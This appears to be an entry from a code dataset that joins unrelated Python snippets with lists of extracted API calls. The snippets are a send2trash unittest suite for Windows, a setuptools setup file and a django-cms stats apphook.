(8113, 8120), True, 'import numpy as np\n'), ((9716, 9753), 'numpy.array', 'np.array', (['[left, top - label_size[1]]'], {}), '([left, top - label_size[1]])\n', (9724, 9753), True, 'import numpy as np\n'), ((9802, 9827), 'numpy.array', 'np.array', (['[left, top + 1]'], {}), '([left, top + 1])\n', (9810, 9827), True, 'import numpy as np\n'), ((2344, 2367), 'colorsys.hsv_to_rgb', 'colorsys.hsv_to_rgb', (['*x'], {}), '(*x)\n', (2363, 2367), False, 'import colorsys\n'), ((6867, 6879), 'math.exp', 'math.exp', (['tw'], {}), '(tw)\n', (6875, 6879), False, 'import math\n'), ((6905, 6917), 'math.exp', 'math.exp', (['th'], {}), '(th)\n', (6913, 6917), False, 'import math\n'), ((7389, 7414), 'numpy.max', 'np.max', (['P_cls[0, ii, :-1]'], {}), '(P_cls[0, ii, :-1])\n', (7395, 7414), True, 'import numpy as np\n'), ((9259, 9274), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (9267, 9274), True, 'import numpy as np\n'), ((9343, 9358), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (9351, 9358), True, 'import numpy as np\n'), ((5385, 5407), 'numpy.zeros', 'np.zeros', (['target_shape'], {}), '(target_shape)\n', (5393, 5407), True, 'import numpy as np\n'), ((5974, 5999), 'numpy.max', 'np.max', (['P_cls[0, ii, :-1]'], {}), '(P_cls[0, ii, :-1])\n', (5980, 5999), True, 'import numpy as np\n'), ((6021, 6047), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (6030, 6047), True, 'import numpy as np\n'), ((8713, 8732), 'numpy.shape', 'np.shape', (['old_image'], {}), '(old_image)\n', (8721, 8732), True, 'import numpy as np\n'), ((8738, 8757), 'numpy.shape', 'np.shape', (['old_image'], {}), '(old_image)\n', (8746, 8757), True, 'import numpy as np\n'), ((9133, 9152), 'numpy.floor', 'np.floor', (['(top + 0.5)'], {}), '(top + 0.5)\n', (9141, 9152), True, 'import numpy as np\n'), ((9196, 9216), 'numpy.floor', 'np.floor', (['(left + 0.5)'], {}), '(left + 0.5)\n', (9204, 9216), True, 'import numpy as np\n'), ((9279, 9301), 'numpy.floor', 
'np.floor', (['(bottom + 0.5)'], {}), '(bottom + 0.5)\n', (9287, 9301), True, 'import numpy as np\n'), ((9363, 9384), 'numpy.floor', 'np.floor', (['(right + 0.5)'], {}), '(right + 0.5)\n', (9371, 9384), True, 'import numpy as np\n'), ((8648, 8663), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (8656, 8663), True, 'import numpy as np\n')] |
# coding: utf-8
import os
import shutil
import sys
import unittest
from os import path as op
from tempfile import gettempdir
from send2trash import send2trash as s2t
# import the two versions as well as the "automatic" version
from send2trash.plat_win_modern import send2trash as s2t_modern
from send2trash.plat_win_legacy import send2trash as s2t_legacy
@unittest.skipIf(sys.platform != "win32", "Windows only")
class TestNormal(unittest.TestCase):
def setUp(self):
self.dirname = "\\\\?\\" + op.join(gettempdir(), "python.send2trash")
self.file = op.join(self.dirname, "testfile.txt")
self._create_tree(self.file)
self.files = [
op.join(self.dirname, "testfile{}.txt".format(index)) for index in range(10)
]
[self._create_tree(file) for file in self.files]
def tearDown(self):
shutil.rmtree(self.dirname, ignore_errors=True)
def _create_tree(self, path):
dirname = op.dirname(path)
if not op.isdir(dirname):
os.makedirs(dirname)
with open(path, "w") as writer:
writer.write("send2trash test")
def _trash_file(self, fcn):
fcn(self.file)
self.assertFalse(op.exists(self.file))
def _trash_multifile(self, fcn):
fcn(self.files)
self.assertFalse(any([op.exists(file) for file in self.files]))
def _file_not_found(self, fcn):
file = op.join(self.dirname, "otherfile.txt")
self.assertRaises(WindowsError, fcn, file)
def test_trash_file(self):
self._trash_file(s2t)
def test_trash_multifile(self):
self._trash_multifile(s2t)
def test_file_not_found(self):
self._file_not_found(s2t)
def test_trash_file_modern(self):
self._trash_file(s2t_modern)
def test_trash_multifile_modern(self):
self._trash_multifile(s2t_modern)
def test_file_not_found_modern(self):
self._file_not_found(s2t_modern)
def test_trash_file_legacy(self):
self._trash_file(s2t_legacy)
def test_trash_multifile_legacy(self):
self._trash_multifile(s2t_legacy)
def test_file_not_found_legacy(self):
self._file_not_found(s2t_legacy)
@unittest.skipIf(sys.platform != "win32", "Windows only")
class TestLongPath(unittest.TestCase):
def setUp(self):
self.functions = {s2t: "auto", s2t_legacy: "legacy", s2t_modern: "modern"}
filename = "A" * 100
self.dirname = "\\\\?\\" + op.join(gettempdir(), filename)
path = op.join(
self.dirname,
filename,
filename, # From there, the path is not trashable from Explorer
filename,
filename + "{}.txt",
)
self.file = path.format("")
self._create_tree(self.file)
self.files = [path.format(index) for index in range(10)]
[self._create_tree(file) for file in self.files]
def tearDown(self):
shutil.rmtree(self.dirname, ignore_errors=True)
def _create_tree(self, path):
dirname = op.dirname(path)
if not op.isdir(dirname):
os.makedirs(dirname)
with open(path, "w") as writer:
writer.write("Looong filename!")
def _trash_file(self, fcn):
fcn(self.file)
self.assertFalse(op.exists(self.file))
def _trash_multifile(self, fcn):
fcn(self.files)
self.assertFalse(any([op.exists(file) for file in self.files]))
def _trash_folder(self, fcn):
fcn(self.dirname)
self.assertFalse(op.exists(self.dirname))
def test_trash_file(self):
self._trash_file(s2t)
def test_trash_multifile(self):
self._trash_multifile(s2t)
@unittest.skipIf(
op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
"Cannot trash long path from other drive",
)
def test_trash_folder(self):
self._trash_folder(s2t)
def test_trash_file_modern(self):
self._trash_file(s2t_modern)
def test_trash_multifile_modern(self):
self._trash_multifile(s2t_modern)
@unittest.skipIf(
op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
"Cannot trash long path from other drive",
)
def test_trash_folder_modern(self):
self._trash_folder(s2t_modern)
def test_trash_file_legacy(self):
self._trash_file(s2t_legacy)
def test_trash_multifile_legacy(self):
self._trash_multifile(s2t_legacy)
@unittest.skipIf(
op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
"Cannot trash long path from other drive",
)
def test_trash_folder_legacy(self):
self._trash_folder(s2t_legacy)
| [
"os.path.exists",
"os.makedirs",
"unittest.skipIf",
"os.path.join",
"os.getcwd",
"os.path.dirname",
"os.path.isdir",
"tempfile.gettempdir",
"shutil.rmtree"
] | [((360, 416), 'unittest.skipIf', 'unittest.skipIf', (["(sys.platform != 'win32')", '"""Windows only"""'], {}), "(sys.platform != 'win32', 'Windows only')\n", (375, 416), False, 'import unittest\n'), ((2207, 2263), 'unittest.skipIf', 'unittest.skipIf', (["(sys.platform != 'win32')", '"""Windows only"""'], {}), "(sys.platform != 'win32', 'Windows only')\n", (2222, 2263), False, 'import unittest\n'), ((573, 610), 'os.path.join', 'op.join', (['self.dirname', '"""testfile.txt"""'], {}), "(self.dirname, 'testfile.txt')\n", (580, 610), True, 'from os import path as op\n'), ((860, 907), 'shutil.rmtree', 'shutil.rmtree', (['self.dirname'], {'ignore_errors': '(True)'}), '(self.dirname, ignore_errors=True)\n', (873, 907), False, 'import shutil\n'), ((961, 977), 'os.path.dirname', 'op.dirname', (['path'], {}), '(path)\n', (971, 977), True, 'from os import path as op\n'), ((1418, 1456), 'os.path.join', 'op.join', (['self.dirname', '"""otherfile.txt"""'], {}), "(self.dirname, 'otherfile.txt')\n", (1425, 1456), True, 'from os import path as op\n'), ((2518, 2590), 'os.path.join', 'op.join', (['self.dirname', 'filename', 'filename', 'filename', "(filename + '{}.txt')"], {}), "(self.dirname, filename, filename, filename, filename + '{}.txt')\n", (2525, 2590), True, 'from os import path as op\n'), ((2945, 2992), 'shutil.rmtree', 'shutil.rmtree', (['self.dirname'], {'ignore_errors': '(True)'}), '(self.dirname, ignore_errors=True)\n', (2958, 2992), False, 'import shutil\n'), ((3046, 3062), 'os.path.dirname', 'op.dirname', (['path'], {}), '(path)\n', (3056, 3062), True, 'from os import path as op\n'), ((993, 1010), 'os.path.isdir', 'op.isdir', (['dirname'], {}), '(dirname)\n', (1001, 1010), True, 'from os import path as op\n'), ((1024, 1044), 'os.makedirs', 'os.makedirs', (['dirname'], {}), '(dirname)\n', (1035, 1044), False, 'import os\n'), ((1210, 1230), 'os.path.exists', 'op.exists', (['self.file'], {}), '(self.file)\n', (1219, 1230), True, 'from os import path as op\n'), ((3078, 
3095), 'os.path.isdir', 'op.isdir', (['dirname'], {}), '(dirname)\n', (3086, 3095), True, 'from os import path as op\n'), ((3109, 3129), 'os.makedirs', 'os.makedirs', (['dirname'], {}), '(dirname)\n', (3120, 3129), False, 'import os\n'), ((3296, 3316), 'os.path.exists', 'op.exists', (['self.file'], {}), '(self.file)\n', (3305, 3316), True, 'from os import path as op\n'), ((3538, 3561), 'os.path.exists', 'op.exists', (['self.dirname'], {}), '(self.dirname)\n', (3547, 3561), True, 'from os import path as op\n'), ((518, 530), 'tempfile.gettempdir', 'gettempdir', ([], {}), '()\n', (528, 530), False, 'from tempfile import gettempdir\n'), ((2479, 2491), 'tempfile.gettempdir', 'gettempdir', ([], {}), '()\n', (2489, 2491), False, 'from tempfile import gettempdir\n'), ((1324, 1339), 'os.path.exists', 'op.exists', (['file'], {}), '(file)\n', (1333, 1339), True, 'from os import path as op\n'), ((3410, 3425), 'os.path.exists', 'op.exists', (['file'], {}), '(file)\n', (3419, 3425), True, 'from os import path as op\n'), ((3742, 3753), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3751, 3753), False, 'import os\n'), ((3775, 3787), 'tempfile.gettempdir', 'gettempdir', ([], {}), '()\n', (3785, 3787), False, 'from tempfile import gettempdir\n'), ((4122, 4133), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4131, 4133), False, 'import os\n'), ((4155, 4167), 'tempfile.gettempdir', 'gettempdir', ([], {}), '()\n', (4165, 4167), False, 'from tempfile import gettempdir\n'), ((4516, 4527), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4525, 4527), False, 'import os\n'), ((4549, 4561), 'tempfile.gettempdir', 'gettempdir', ([], {}), '()\n', (4559, 4561), False, 'from tempfile import gettempdir\n')] |
from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='POC model for publication',
author='<NAME>',
license='MIT',
)
| [
"setuptools.find_packages"
] | [((81, 96), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (94, 96), False, 'from setuptools import find_packages, setup\n')] |
from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import ugettext_lazy as _
class StatsApphook(CMSApp):
name = _("Stats Apphook")
def get_urls(self, page=None, language=None, **kwargs):
return ["danceschool.stats.urls"] # replace this with the path to your application's URLs module
apphook_pool.register(StatsApphook)
| [
"cms.apphook_pool.apphook_pool.register",
"django.utils.translation.ugettext_lazy"
] | [((376, 411), 'cms.apphook_pool.apphook_pool.register', 'apphook_pool.register', (['StatsApphook'], {}), '(StatsApphook)\n', (397, 411), False, 'from cms.apphook_pool import apphook_pool\n'), ((177, 195), 'django.utils.translation.ugettext_lazy', '_', (['"""Stats Apphook"""'], {}), "('Stats Apphook')\n", (178, 195), True, 'from django.utils.translation import ugettext_lazy as _\n')] |